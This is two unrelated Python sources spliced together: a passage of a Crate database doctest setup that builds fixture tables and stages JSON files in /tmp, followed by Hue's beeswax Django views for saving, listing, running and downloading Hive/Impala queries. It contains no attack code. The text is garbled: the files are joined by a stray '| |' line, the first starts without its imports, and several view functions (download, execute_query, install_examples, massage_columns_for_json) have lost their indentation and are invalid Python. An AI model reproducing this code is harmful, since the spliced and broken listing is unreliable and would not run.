bash_parser = zc.customdoctests.DocTestParser(
    ps1='sh\$', comment_prefix='#', transform=bash_transform)
crash_parser = zc.customdoctests.DocTestParser(
    ps1='cr>', comment_prefix='#', transform=crash_transform)
class ConnectingCrateLayer(CrateLayer):
    """CrateLayer that connects the shared ``cmd`` once the server is up."""
    def start(self):
        super(ConnectingCrateLayer, self).start()
        cmd._connect(self.crate_servers[0])
# Single Crate test server shared by every doctest suite below.
empty_layer = ConnectingCrateLayer(
    'crate',
    crate_home=crate_path(),
    crate_exec=crate_path('bin', 'crate'),
    port=CRATE_HTTP_PORT,
    transport_port=CRATE_TRANSPORT_PORT,
    settings={
        # Keep the cluster ephemeral and fast for tests.
        'gateway.type': 'none',
        'index.store.type': 'memory',
        'cluster.routing.schedule': '30ms'
    }
)
def setUpLocations(test):
    """Create and populate the ``locations`` fixture table for a doctest."""
    test.globs['cmd'] = cmd
    cmd.stmt("""
        create table locations (
          id string primary key,
          name string,
          date timestamp,
          kind string,
          position integer,
          description string,
          race object(dynamic) as (
            interests array(string)
          ),
          information array(object as (
            population long,
            evolution_level short
            )
          ),
          index name_description_ft using fulltext(name, description) with (analyzer='english')
        ) clustered by(id) into 2 shards with (number_of_replicas=0)""".strip())
    cmd.stmt("delete from locations")
    fixture_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "locations.json"))
    cmd.stmt("""copy locations from '{0}'""".format(fixture_path))
    cmd.stmt("""refresh table locations""")
def tearDownLocations(test):
    """Drop the ``locations`` fixture table."""
    cmd.stmt("""drop table locations""")
def setUpUserVisits(test):
    """Create and populate the ``uservisits`` fixture table for a doctest."""
    test.globs['cmd'] = cmd
    cmd.stmt("""
        create table uservisits (
          id integer primary key,
          name string,
          visits integer,
          last_visit timestamp
        )
    """.strip())
    fixture_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "uservisits.json"))
    cmd.stmt("""copy uservisits from '{0}'""".format(fixture_path))
    cmd.stmt("""refresh table uservisits""")
def tearDownUserVisits(test):
    """Drop the ``uservisits`` fixture table."""
    cmd.stmt("""drop table uservisits""")
def setUpQuotes(test):
    """Create the ``quotes`` table and stage its import fixture on disk."""
    test.globs['cmd'] = cmd
    cmd.stmt("""
        create table quotes (
          id integer primary key,
          quote string
        ) clustered by(id) into 2 shards with(number_of_replicas=0)""")
    staging_dir = '/tmp/import_data'
    if not os.path.isdir(staging_dir):
        os.mkdir(staging_dir)
    source = project_path('sql/src/test/resources/essetup/data/copy', 'test_copy_from.json')
    shutil.copy(source, os.path.join(staging_dir, "quotes.json"))
def tearDownQuotes(test):
    """Drop the ``quotes`` fixture table."""
    cmd.stmt("""drop table quotes""")
def setUpLocationsAndQuotes(test):
    """Set up both the locations and quotes fixtures."""
    setUpLocations(test)
    setUpQuotes(test)
def tearDownLocationsAndQuotes(test):
    """Tear down both the locations and quotes fixtures."""
    tearDownLocations(test)
    tearDownQuotes(test)
def setUpLocationsQuotesAndUserVisits(test):
    """Set up the locations, quotes and uservisits fixtures."""
    setUpLocationsAndQuotes(test)
    setUpUserVisits(test)
def tearDownLocationsQuotesAndUserVisits(test):
    """Tear down the locations, quotes and uservisits fixtures."""
    tearDownLocationsAndQuotes(test)
    tearDownUserVisits(test)
def setUpTutorials(test):
    """Run the basic setUp and stage the best-practice tutorial fixtures."""
    setUp(test)
    staging_dir = '/tmp/best_practice_data'
    source_dir = 'sql/src/test/resources/essetup/data/best_practice'
    if not os.path.isdir(staging_dir):
        os.mkdir(staging_dir)
    # (source fixture, staged name) pairs, copied in this order.
    for source_name, target_name in (
            ('data_import.json', 'users.json'),
            ('data_import.json.gz', 'users.json.gz'),
            ('data_import_1408312800.json', 'users_1408312800.json')):
        shutil.copy(project_path(source_dir, source_name),
                    os.path.join(staging_dir, target_name))
def setUp(test):
    """Expose the shared ``cmd`` and schema helper to the doctest namespace."""
    test.globs['cmd'] = cmd
    test.globs['wait_for_schema_update'] = wait_for_schema_update
def test_suite():
    """Assemble the full suite: process tests plus doctest-driven documentation."""
    suite = unittest.TestSuite()

    # Graceful stop tests
    process_suite = unittest.TestLoader().loadTestsFromModule(process_test)
    suite.addTest(process_suite)

    # Documentation tests
    docs_suite = unittest.TestSuite()
    flags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS

    def add(path, parser, **kwargs):
        # Every doc suite shares the option flags and the crate layer.
        s = doctest.DocFileSuite(path, parser=parser, optionflags=flags, **kwargs)
        s.layer = empty_layer
        docs_suite.addTest(s)

    add('../../blob.txt', bash_parser, setUp=setUp)
    for fn in ('sql/rest.txt',):
        add('../../' + fn, bash_parser,
            setUp=setUpLocations, tearDown=tearDownLocations)
    for fn in ('sql/ddl.txt',
               'sql/dql.txt',
               'sql/refresh.txt',
               'sql/fulltext.txt',
               'sql/data_types.txt',
               'sql/occ.txt',
               'sql/information_schema.txt',
               'sql/partitioned_tables.txt',
               'sql/aggregation.txt',
               'sql/arithmetic.txt',
               'sql/scalar.txt',
               'sql/system.txt',
               'sql/queries.txt',
               'hello.txt'):
        add('../../' + fn, crash_parser,
            setUp=setUpLocationsAndQuotes, tearDown=tearDownLocationsAndQuotes)
    for fn in ('sql/dml.txt',):
        add('../../' + fn, crash_parser,
            setUp=setUpLocationsQuotesAndUserVisits,
            tearDown=tearDownLocationsQuotesAndUserVisits)
    for fn in ('best_practice/migrating_from_mongodb.txt',):
        add(os.path.join('..', '..', fn), crash_parser, setUp=setUp)
    for fn in ('data_import.txt', 'cluster_upgrade.txt'):
        add(os.path.join('..', '..', 'best_practice', fn), crash_parser,
            setUp=setUpTutorials)

    suite.addTests(docs_suite)
    return suite
| |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import math
import re
import sys
import time
from django import forms
from django.contrib import messages
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponse, QueryDict
from django.shortcuts import redirect
from django.utils.html import escape
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from desktop.appmanager import get_apps_dict
from desktop.context_processors import get_app_name
from desktop.lib.paginator import Paginator
from desktop.lib.django_util import JsonResponse
from desktop.lib.django_util import copy_query_dict, format_preserving_redirect, render
from desktop.lib.django_util import login_notrequired, get_desktop_uri_prefix
from desktop.lib.exceptions_renderable import PopupException
from desktop.lib.i18n import smart_unicode
from desktop.models import Document
from jobsub.parameterization import find_variables
import beeswax.forms
import beeswax.design
import beeswax.management.commands.beeswax_install_examples
from beeswax import common, data_export, models
from beeswax.models import SavedQuery, QueryHistory
from beeswax.server import dbms
from beeswax.server.dbms import expand_exception, get_query_server_config, QueryServerException
# Module-level logger for the beeswax views.
LOG = logging.getLogger(__name__)
def index(request):
  """Landing page: open the query editor."""
  return execute_query(request)


"""
Design views
"""
def save_design(request, form, type_, design, explicit_save):
  """
  save_design(request, form, type_, design, explicit_save) -> SavedQuery

  Save the design described by ``form``:
  * If ``explicit_save``, the data is written into the current design.
  * If the user only clicked submit, the current design is NOT overwritten;
    a new "auto" design is created instead (iff the data changed), named
    after the current design plus AUTO_DESIGN_SUFFIX.

  Returns a SavedQuery because the caller may end up with a different one.
  Assumes form.saveform is a valid SaveForm.
  """
  authorized_get_design(request, design.id)
  assert form.saveform.is_valid()

  sub_design_form = form  # Beeswax/Impala case
  # Beeswax and Impala share the HQL design class.
  if type_ in (models.HQL, models.IMPALA):
    design_cls = beeswax.design.HQLdesign
  elif type_ == models.SPARK:
    from spark.design import SparkDesign
    design_cls = SparkDesign
    sub_design_form = form.query
  else:
    raise ValueError(_('Invalid design type %(type)s') % {'type': type_})

  design_obj = design_cls(sub_design_form, query_type=type_)
  name = form.saveform.cleaned_data['name']
  desc = form.saveform.cleaned_data['desc']
  return _save_design(request.user, design, type_, design_obj, explicit_save, name, desc)
def _save_design(user, design, type_, design_obj, explicit_save, name=None, desc=None):
  """Persist a design (SavedQuery), cloning it into an auto-save when needed.

  Explicit saves overwrite the design in place (given write access); implicit
  saves only create a clone when the data actually changed.
  """
  # Design here means SavedQuery
  old_design = design
  new_data = design_obj.dumps()

  # Auto save if (1) the user didn't click "save", and (2) the data is different.
  # Create an history design if the user is executing a shared design.
  # Don't generate an auto-saved design if the user didn't change anything.
  if explicit_save and (not design.doc.exists() or design.doc.get().can_write_or_exception(user)):
    design.name = name
    design.desc = desc
    design.is_auto = False
  elif design_obj != old_design.get_design():
    # Auto save iff the data is different
    if old_design.id is not None:
      # Clone iff the parent design isn't a new unsaved model
      design = old_design.clone(new_owner=user)
      if not old_design.is_auto:
        design.name = old_design.name + models.SavedQuery.AUTO_DESIGN_SUFFIX
    else:
      design.name = models.SavedQuery.DEFAULT_NEW_DESIGN_NAME
    design.is_auto = True

  design.name = design.name[:64]
  design.type = type_
  design.data = new_data
  design.save()

  LOG.info('Saved %s design "%s" (id %s) for %s' % (explicit_save and '' or 'auto ', design.name, design.id, design.owner))

  # Keep the Document metadata in sync with the design.
  if design.doc.exists():
    design.doc.update(name=design.name, description=design.desc)
  else:
    Document.objects.link(design, owner=design.owner, extra=design.type, name=design.name, description=design.desc)
  if design.is_auto:
    design.doc.get().add_to_history()
  return design
def delete_design(request):
  """Delete (or send to trash) the designs selected in the POST; ask for
  confirmation on any other method."""
  if request.method != 'POST':
    return render('confirm.mako', request, {'url': request.path, 'title': _('Delete design(s)?')})

  ids = request.POST.getlist('designs_selection')
  designs = dict([(design_id, authorized_get_design(request, design_id, owner_only=True)) for design_id in ids])

  # Refuse the whole batch when any id does not resolve to a design.
  if None in designs.values():
    LOG.error('Cannot delete non-existent design(s) %s' % ','.join([key for key, name in designs.items() if name is None]))
    return list_designs(request)

  for design in designs.values():
    if request.POST.get('skipTrash', 'false') == 'false':
      design.doc.get().send_to_trash()
    else:
      design.doc.all().delete()
      design.delete()
  return redirect(reverse(get_app_name(request) + ':list_designs'))
def restore_design(request):
  """Restore the trashed designs selected in the POST; ask for confirmation
  on any other method."""
  if request.method != 'POST':
    return render('confirm.mako', request, {'url': request.path, 'title': _('Restore design(s)?')})

  ids = request.POST.getlist('designs_selection')
  designs = dict([(design_id, authorized_get_design(request, design_id)) for design_id in ids])

  # Refuse the whole batch when any id does not resolve to a design.
  if None in designs.values():
    LOG.error('Cannot restore non-existent design(s) %s' % ','.join([key for key, name in designs.items() if name is None]))
    return list_designs(request)

  for design in designs.values():
    design.doc.get().restore_from_trash()
  return redirect(reverse(get_app_name(request) + ':list_designs'))
def clone_design(request, design_id):
  """Clone a design belonging to any user and open the editor on the copy."""
  design = authorized_get_design(request, design_id)
  if design is None:
    LOG.error('Cannot clone non-existent design %s' % (design_id,))
    return list_designs(request)

  duplicate = design.clone(request.user)
  duplicate.save()

  # Replace the auto-linked Document with a copy of the original's.
  doc_copy = design.doc.get().copy(owner=request.user)
  duplicate.doc.all().delete()
  duplicate.doc.add(doc_copy)

  messages.info(request, _('Copied design: %(name)s') % {'name': design.name})
  return format_preserving_redirect(request, reverse(get_app_name(request) + ':execute_design', kwargs={'design_id': duplicate.id}))
def list_designs(request):
  """
  Show all saved queries.

  Reached from /beeswax/list_designs?filterargs, where the options are:
    page=<n>    - Controls pagination. Defaults to 1.
    user=<name> - Show design items belonging to a user. Default to all users.
    type=<type> - <type> is "hql", for saved query type. Default to show all.
    sort=<key>  - Sort by the attribute <key>, which is one of:
                  "date", "name", "desc", and "type" (design type)
                  Accepts the form "-date", which sorts in descending order.
                  Defaults to "-date".
    text=<frag> - Search for fragment "frag" in names and descriptions.
  """
  DEFAULT_PAGE_SIZE = 20
  app_name = get_app_name(request)

  # Saved-query filter args arrive with a 'q-' prefix.
  prefix = 'q-'
  querydict_query = _copy_prefix(prefix, request.GET)
  # Force the type filter to this app, regardless of what the client sent.
  querydict_query[prefix + 'type'] = app_name
  page, filter_params = _list_designs(request.user, querydict_query, DEFAULT_PAGE_SIZE, prefix)

  return render('list_designs.mako', request, {
    'page': page,
    'filter_params': filter_params,
    'user': request.user,
    'designs_json': json.dumps([query.id for query in page.object_list])
  })
def list_trashed_designs(request):
  """Show the saved queries currently in the trash."""
  DEFAULT_PAGE_SIZE = 20
  app_name = get_app_name(request)

  # Saved-query filter args arrive with a 'q-' prefix.
  prefix = 'q-'
  querydict_query = _copy_prefix(prefix, request.GET)
  # Force the type filter to this app, regardless of what the client sent.
  querydict_query[prefix + 'type'] = app_name
  page, filter_params = _list_designs(request.user, querydict_query, DEFAULT_PAGE_SIZE, prefix, is_trashed=True)

  return render('list_trashed_designs.mako', request, {
    'page': page,
    'filter_params': filter_params,
    'user': request.user,
    'designs_json': json.dumps([query.id for query in page.object_list])
  })
def my_queries(request):
  """
  View a mix of query history and saved queries.

  Understands the GET params of ``list_query_history`` (prefixed with ``h-``)
  and of ``list_designs`` (prefixed with ``q-``).  The ``user`` filter is not
  honored: this view only ever shows what belongs to the current user.
  """
  DEFAULT_PAGE_SIZE = 30
  app_name = get_app_name(request)

  # History half ('h-' prefixed filters), forced to the current user/app.
  hist_prefix = 'h-'
  querydict_history = _copy_prefix(hist_prefix, request.GET)
  querydict_history[hist_prefix + 'user'] = request.user
  querydict_history[hist_prefix + 'type'] = app_name
  hist_page, hist_filter = _list_query_history(request.user,
                                               querydict_history,
                                               DEFAULT_PAGE_SIZE,
                                               hist_prefix)

  # Saved-query half ('q-' prefixed filters), forced to the current user/app.
  query_prefix = 'q-'
  querydict_query = _copy_prefix(query_prefix, request.GET)
  querydict_query[query_prefix + 'user'] = request.user
  querydict_query[query_prefix + 'type'] = app_name
  query_page, query_filter = _list_designs(request.user, querydict_query, DEFAULT_PAGE_SIZE, query_prefix)

  filter_params = hist_filter
  filter_params.update(query_filter)

  return render('my_queries.mako', request, {
    'request': request,
    'h_page': hist_page,
    'q_page': query_page,
    'filter_params': filter_params,
    'designs_json': json.dumps([query.id for query in query_page.object_list])
  })
def list_query_history(request):
  """
  View the query history of the current user (all users for superusers).

  Reached from /beeswax/query_history?filterargs, where the options are:
    page=<n>          - Controls pagination. Defaults to 1.
    user=<name>       - Show history items from a user. Default to current user only.
                        Also accepts ':all' to show all history items.
    type=<type>       - <type> is "beeswax|impala", for design type. Default to show all.
    design_id=<id>    - Show history for this particular design id.
    sort=<key>        - Sort by the attribute <key>, which is one of:
                        "date", "state", "name" (design name), and "type" (design type)
                        Accepts the form "-date", which sorts in descending order.
                        Defaults to "-date".
    auto_query=<bool> - Show auto generated actions (drop table, read data, etc). Default True
  """
  DEFAULT_PAGE_SIZE = 100
  prefix = 'q-'

  # Superusers can see everybody's queries; everyone else only their own.
  share_queries = request.user.is_superuser

  querydict_query = request.GET.copy()
  if not share_queries:
    querydict_query[prefix + 'user'] = request.user.username

  app_name = get_app_name(request)
  querydict_query[prefix + 'type'] = app_name

  page, filter_params = _list_query_history(request.user, querydict_query, DEFAULT_PAGE_SIZE, prefix)

  # Single lookup with '' fallback (was a redundant `a and a or ''`); the
  # local no longer shadows the `filter` builtin, template key is unchanged.
  search_filter = request.GET.get(prefix + 'search') or ''

  if request.GET.get('format') == 'json':
    resp = {
      'queries': [massage_query_history_for_json(app_name, query_history) for query_history in page.object_list]
    }
    return JsonResponse(resp)

  return render('list_history.mako', request, {
    'request': request,
    'page': page,
    'filter_params': filter_params,
    'share_queries': share_queries,
    'prefix': prefix,
    'filter': search_filter,
  })
def massage_query_history_for_json(app_name, query_history):
  """Serialize one QueryHistory row for the JSON history listing."""
  # Failed queries have no results page to link to.
  if query_history.is_failure():
    results_url = ""
  else:
    results_url = reverse(app_name + ':watch_query_history', kwargs={'query_history_id': query_history.id})

  submitted = query_history.submission_date
  return {
    'query': escape(query_history.query),
    'timeInMs': time.mktime(submitted.timetuple()),
    'timeFormatted': submitted.strftime("%x %X"),
    'designUrl': reverse(app_name + ':execute_design', kwargs={'design_id': query_history.design.id}),
    'resultsUrl': results_url
  }
def download(request, id, format):
try:
query_history = authorized_get_query_history(request, id, must_exist=True)
db = dbms.get(request.user, query_history.get_query_server_config())
LOG.debug('Download results for query %s: [ %s ]' % (query_history.server_id, query_history.query))
return data_export.download(query_history.get_handle(), format, db)
except Exception, e:
if not hasattr(e, 'message') or not e.message:
message = e
else:
message = e.message
raise PopupException(message, detail='')
"""
Queries Views
"""
def execute_query(request, design_id=None, query_history_id=None):
"""
View function for executing an arbitrary query.
"""
action = 'query'
if query_history_id:
query_history = authorized_get_query_history(request, query_history_id, must_exist=True)
design = query_history.design
try:
if query_history.server_id and query_history.server_guid:
handle, state = _get_query_handle_and_state(query_history)
if 'on_success_url' in request.GET:
if request.GET.get('on_success_url'):
action = 'watch-redirect'
else:
action = 'watch-results'
else:
action = 'editor-results'
except QueryServerException, e:
if 'Invalid query handle' in e.message or 'Invalid OperationHandle' in e.message:
query_history.save_state(QueryHistory.STATE.expired)
LOG.warn("Invalid query handle", exc_info=sys.exc_info())
action = 'editor-expired-results'
else:
raise e
else:
# Check perms.
authorized_get_design(request, design_id)
app_name = get_app_name(request)
query_type = SavedQuery.TYPES_MAPPING[app_name]
design = safe_get_design(request, query_type, design_id)
query_history = None
doc = design and design.id and design.doc.get()
context = {
'design': design,
'query': query_history, # Backward
'query_history': query_history,
'autocomplete_base_url': reverse(get_app_name(request) + ':api_autocomplete_databases', kwargs={}),
'autocomplete_base_url_hive': reverse('beeswax:api_autocomplete_databases', kwargs={}),
'can_edit_name': design and design.id and not design.is_auto,
'doc_id': doc and doc.id or -1,
'can_edit': doc and doc.can_write(request.user),
'action': action,
'on_success_url': request.GET.get('on_success_url'),
'has_metastore': 'metastore' in get_apps_dict(request.user)
}
return render('execute.mako', request, context)
def view_results(request, id, first_row=0):
  """
  Returns the view for the results of the QueryHistory with the given id.

  The query results MUST be ready.
  To display query results, one should always go through the execute_query view.
  If the result set has has_result_set=False, display an empty result.

  If ``first_row`` is 0, restarts (if necessary) the query read.  Otherwise, just
  spits out a warning if first_row doesn't match the servers conception.
  Multiple readers will produce a confusing interaction here, and that's known.

  It understands the ``context`` GET parameter. (See execute_query().)
  """
  first_row = long(first_row)
  start_over = (first_row == 0)
  # Placeholder result object used when fetching is skipped or fails.
  results = type('Result', (object,), {
                'rows': 0,
                'columns': [],
                'has_more': False,
                'start_row': 0,
            })
  data = []
  fetch_error = False
  error_message = ''
  log = ''
  columns = []
  app_name = get_app_name(request)

  query_history = authorized_get_query_history(request, id, must_exist=True)
  query_server = query_history.get_query_server_config()
  db = dbms.get(request.user, query_server)

  handle, state = _get_query_handle_and_state(query_history)
  context_param = request.GET.get('context', '')
  query_context = parse_query_context(context_param)

  # Update the status as expired should not be accessible
  expired = state == models.QueryHistory.STATE.expired

  # Retrieve query results or use empty result if no result set
  try:
    if query_server['server_name'] == 'impala' and not handle.has_result_set:
      downloadable = False
    else:
      results = db.fetch(handle, start_over, 100)
      data = []

      # Materialize and HTML escape results
      # TODO: use Number + list comprehension
      for row in results.rows():
        escaped_row = []
        for field in row:
          if isinstance(field, (int, long, float, complex, bool)):
            # NaN/Inf are not valid JSON literals; serialize them as strings.
            if math.isnan(field) or math.isinf(field):
              escaped_field = json.dumps(field)
            else:
              escaped_field = field
          elif field is None:
            escaped_field = 'NULL'
          else:
            field = smart_unicode(field, errors='replace') # Prevent error when getting back non utf8 like charset=iso-8859-1
            escaped_field = escape(field).replace(' ', '&nbsp;')
          escaped_row.append(escaped_field)
        data.append(escaped_row)

      # We display the "Download" button only when we know that there are results:
      downloadable = first_row > 0 or data
      log = db.get_log(handle)
      columns = results.data_table.cols()

  except Exception, ex:
    fetch_error = True
    error_message, log = expand_exception(ex, db, handle)

  # Handle errors
  error = fetch_error or results is None or expired

  context = {
    'error': error,
    'message': error_message,
    'query': query_history,
    'results': data,
    'columns': columns,
    'expected_first_row': first_row,
    'log': log,
    'hadoop_jobs': app_name != 'impala' and _parse_out_hadoop_jobs(log),
    'query_context': query_context,
    'can_save': False,
    'context_param': context_param,
    'expired': expired,
    'app_name': app_name,
    'next_json_set': None,
    'is_finished': query_history.is_finished()
  }

  if not error:
    download_urls = {}
    if downloadable:
      for format in common.DL_FORMATS:
        download_urls[format] = reverse(app_name + ':download', kwargs=dict(id=str(id), format=format))

    results.start_row = first_row

    context.update({
      'id': id,
      'results': data,
      'has_more': results.has_more,
      'next_row': results.start_row + len(data),
      'start_row': results.start_row,
      'expected_first_row': first_row,
      'columns': columns,
      'download_urls': download_urls,
      'can_save': query_history.owner == request.user,
      'next_json_set':
        reverse(get_app_name(request) + ':view_results', kwargs={
            'id': str(id),
            'first_row': results.start_row + len(data)
          }
        )
        + ('?context=' + context_param or '') + '&format=json'
    })

  context['columns'] = massage_columns_for_json(columns)
  # These entries are not JSON-serializable; drop them before responding.
  if 'save_form' in context:
    del context['save_form']
  if 'query' in context:
    del context['query']
  return JsonResponse(context)
def configuration(request):
  """Show the default configuration values of the current query server."""
  app_name = get_app_name(request)
  query_server = get_query_server_config(app_name)
  include_hadoop = bool(request.REQUEST.get("include_hadoop", False))
  config_values = dbms.get(request.user, query_server).get_default_configuration(include_hadoop)

  # Never render password values in clear text.
  for value in config_values:
    if 'password' in value.key.lower():
      value.value = "*" * 10

  return render("configuration.mako", request, {'config_values': config_values})
"""
Other views
"""
def install_examples(request):
response = {'status': -1, 'message': ''}
if request.method == 'POST':
try:
app_name = get_app_name(request)
beeswax.management.commands.beeswax_install_examples.Command().handle(app_name=app_name, user=request.user)
response['status'] = 0
except Exception, err:
LOG.exception(err)
response['message'] = str(err)
else:
response['message'] = _('A POST request is required.')
return JsonResponse(response)
@login_notrequired
def query_done_cb(request, server_id):
  """
  A callback for query completion notification. When the query is done,
  BeeswaxServer notifies us by sending a GET request to this view.

  E-mails the owner when the query was submitted with email_notify set.
  """
  message_template = '<html><head></head>%(message)s<body></body></html>'
  message = {'message': 'error'}

  try:
    # NOTE(review): the lookup appends '\n' — server_id is apparently stored
    # with a trailing newline; confirm against how QueryHistory records it.
    query_history = QueryHistory.objects.get(server_id=server_id + '\n')

    # Update the query status
    query_history.set_to_available()

    # Find out details about the query
    if not query_history.notify:
      message['message'] = 'email_notify is false'
      return HttpResponse(message_template % message)

    design = query_history.design
    user = query_history.owner
    subject = _("Beeswax query completed.")

    if design:
      subject += ": %s" % (design.name,)

    link = "%s%s" % \
           (get_desktop_uri_prefix(),
            reverse(get_app_name(request) + ':watch_query_history', kwargs={'query_history_id': query_history.id}))
    body = _("%(subject)s. See the results here: %(link)s\n\nQuery:\n%(query)s") % {
             'subject': subject, 'link': link, 'query': query_history.query
           }

    user.email_user(subject, body)
    message['message'] = 'sent'
  except Exception, ex:
    # Best-effort: notification failures are logged and reported, not raised.
    msg = "Failed to send query completion notification via e-mail: %s" % (ex)
    LOG.error(msg)
    message['message'] = msg
  return HttpResponse(message_template % message)
"""
Utils
"""
def massage_columns_for_json(cols):
massaged_cols = []
for column in cols:
massaged_cols.append({
'name': column.name,
'type': column.type,
'comment': column.comment
})
return massaged_cols
def authorized_get_design(request, design_id, owner_only=False, must_exist=False):
  """Fetch a SavedQuery and enforce the user's access to it.

  Returns None for a missing design unless ``must_exist`` is set, in which
  case a PopupException is raised.
  """
  if design_id is None and not must_exist:
    return None

  try:
    design = SavedQuery.objects.get(id=design_id)
  except SavedQuery.DoesNotExist:
    if must_exist:
      raise PopupException(_('Design %(id)s does not exist.') % {'id': design_id})
    return None

  # Write access is required for destructive operations; read is enough otherwise.
  if owner_only:
    design.doc.get().can_write_or_exception(request.user)
  else:
    design.doc.get().can_read_or_exception(request.user)

  return design
def authorized_get_query_history(request, query_history_id, owner_only=False, must_exist=False):
    """Fetch a QueryHistory by id, enforcing the requesting user's permission.

    Returns None when query_history_id is None (unless must_exist) or when the
    record is missing; raises PopupException when must_exist and it is missing,
    or when the user may not read it.
    """
    if query_history_id is None and not must_exist:
        return None

    try:
        query_history = QueryHistory.get(id=query_history_id)
    except QueryHistory.DoesNotExist:
        if not must_exist:
            return None
        raise PopupException(_('QueryHistory %(id)s does not exist.') % {'id': query_history_id})

    # Some queries don't have a design so are not linked to Document Model permission
    design = query_history.design
    if design is None or not design.doc.exists():
        # Fall back to owner/superuser check when no Document row exists.
        if not request.user.is_superuser and request.user != query_history.owner:
            raise PopupException(_('Permission denied to read QueryHistory %(id)s') % {'id': query_history_id})
    else:
        design.doc.get().can_read_or_exception(request.user)

    return query_history
def safe_get_design(request, design_type, design_id=None):
    """
    Return a new design, if design_id is None.

    Return the design with the given id and type. If the design is not found,
    fall back to a brand-new design owned by the requesting user.
    """
    design = authorized_get_design(request, design_id) if design_id is not None else None
    if design is None:
        design = SavedQuery(owner=request.user, type=design_type)
    return design
def make_parameterization_form(query_str):
    """
    Create a Django form class on the fly with one required CharField per
    variable found in the query string.

    Returns the form class, or None when the query contains no variables.
    """
    variables = find_variables(query_str)
    if not variables:
        return None

    # Build the class through its metaclass instead of assigning into
    # locals() inside a class body: mutating locals() is documented as
    # implementation-dependent, and the old loop also leaked a stray `name`
    # attribute (the last variable name string) onto the form class.
    fields = dict((name, forms.CharField(required=True))
                  for name in sorted(variables))
    return type(forms.Form)('Form', (forms.Form,), fields)
def execute_directly(request, query, query_server=None,
                     design=None, on_success_url=None, on_success_params=None,
                     **kwargs):
    """
    execute_directly(request, query, ...) -> HTTP redirect to the watch page

    This method wraps around dbms.execute_query() to take care of the HTTP response
    after the execution.

    query
      The HQL model Query object.

    query_server
      To which Query Server to submit the query.
      Dictionary with keys: ['server_name', 'server_host', 'server_port'].

    design
      The design associated with the query.

    on_success_url
      Where to go after the query is done. The URL handler may expect an option "context" GET
      param. (See ``watch_query``.) For advanced usage, on_success_url can be a function, in
      which case the on complete URL is the return of:
        on_success_url(history_obj) -> URL string
      Defaults to the view results page.

    on_success_params
      Optional params to pass to the on_success_url (in additional to "context").

    Note that this may throw a Beeswax exception.
    """
    # Re-check the user's permission on the design before executing on its behalf.
    if design is not None:
        authorized_get_design(request, design.id)

    db = dbms.get(request.user, query_server)
    # The query object carries its target database; fall back to 'default'.
    database = query.query.get('database', 'default')
    db.use(database)

    query_history = db.execute_query(query, design)

    watch_url = reverse(get_app_name(request) + ':watch_query_history', kwargs={'query_history_id': query_history.id})

    # Prepare the GET params for the watch_url
    get_dict = QueryDict(None, mutable=True)

    # (1) on_success_url
    if on_success_url:
        if callable(on_success_url):
            on_success_url = on_success_url(query_history)
        get_dict['on_success_url'] = on_success_url

    # (2) misc
    if on_success_params:
        get_dict.update(on_success_params)

    return format_preserving_redirect(request, watch_url, get_dict)
def _list_designs(user, querydict, page_size, prefix="", is_trashed=False):
    """
    _list_designs(user, querydict, page_size, prefix, is_trashed) -> (page, filter_param)

    A helper to gather the designs page. It understands all the GET params in
    ``list_designs``, by reading keys from the ``querydict`` with the given
    ``prefix``.
    """
    DEFAULT_SORT = ('-', 'date')  # Descending date

    SORT_ATTR_TRANSLATION = dict(
        date='last_modified',
        name='name',
        desc='description',
        type='extra',
    )

    # Trash and security
    if is_trashed:
        db_queryset = Document.objects.trashed_docs(SavedQuery, user)
    else:
        db_queryset = Document.objects.available_docs(SavedQuery, user)

    # Filter by user
    filter_username = querydict.get(prefix + 'user')
    if filter_username:
        try:
            db_queryset = db_queryset.filter(owner=User.objects.get(username=filter_username))
        except User.DoesNotExist:
            # Don't care if a bad filter term is provided
            pass

    # Design type (membership tested directly on the dict, not on .keys())
    d_type = querydict.get(prefix + 'type')
    if d_type and d_type in SavedQuery.TYPES_MAPPING:
        db_queryset = db_queryset.filter(extra=str(SavedQuery.TYPES_MAPPING[d_type]))

    # Text search
    frag = querydict.get(prefix + 'text')
    if frag:
        db_queryset = db_queryset.filter(Q(name__icontains=frag) | Q(description__icontains=frag))

    # Ordering
    sort_key = querydict.get(prefix + 'sort')
    if sort_key:
        if sort_key[0] == '-':
            sort_dir, sort_attr = '-', sort_key[1:]
        else:
            sort_dir, sort_attr = '', sort_key

        # `dict.has_key` was removed in Python 3; `in` works everywhere.
        if sort_attr not in SORT_ATTR_TRANSLATION:
            LOG.warn('Bad parameter to list_designs: sort=%s' % (sort_key,))
            sort_dir, sort_attr = DEFAULT_SORT
    else:
        sort_dir, sort_attr = DEFAULT_SORT

    db_queryset = db_queryset.order_by(sort_dir + SORT_ATTR_TRANSLATION[sort_attr])

    # Materialize designs, skipping dangling documents and auto-generated designs.
    designs = [job.content_object for job in db_queryset.all()
               if job.content_object and not job.content_object.is_auto]

    pagenum = int(querydict.get(prefix + 'page', 1))
    paginator = Paginator(designs, page_size)
    page = paginator.page(pagenum)

    # We need to pass the parameters back to the template to generate links
    keys_to_copy = [prefix + key for key in ('user', 'type', 'sort')]
    filter_params = copy_query_dict(querydict, keys_to_copy)

    return page, filter_params
def _get_query_handle_and_state(query_history):
    """
    Front-end wrapper to handle exceptions. Expects the query to be submitted.
    """
    handle = query_history.get_handle()
    if handle is None:
        raise PopupException(_("Failed to retrieve query state from the Query Server."))

    server_config = query_history.get_query_server_config()
    state = dbms.get(query_history.owner, server_config).get_state(handle)
    if state is None:
        raise PopupException(_("Failed to contact Server to check query status."))

    return handle, state
def parse_query_context(context):
    """
    parse_query_context(context) -> ('table', <table_name>) -or- ('design', <design_obj>)
    """
    if not context:
        return None

    parts = context.split(':', 1)
    if len(parts) == 2 and parts[0] in ('table', 'design'):
        if parts[0] == 'design':
            # Translate design id to design obj
            parts[1] = models.SavedQuery.get(int(parts[1]))
        return parts

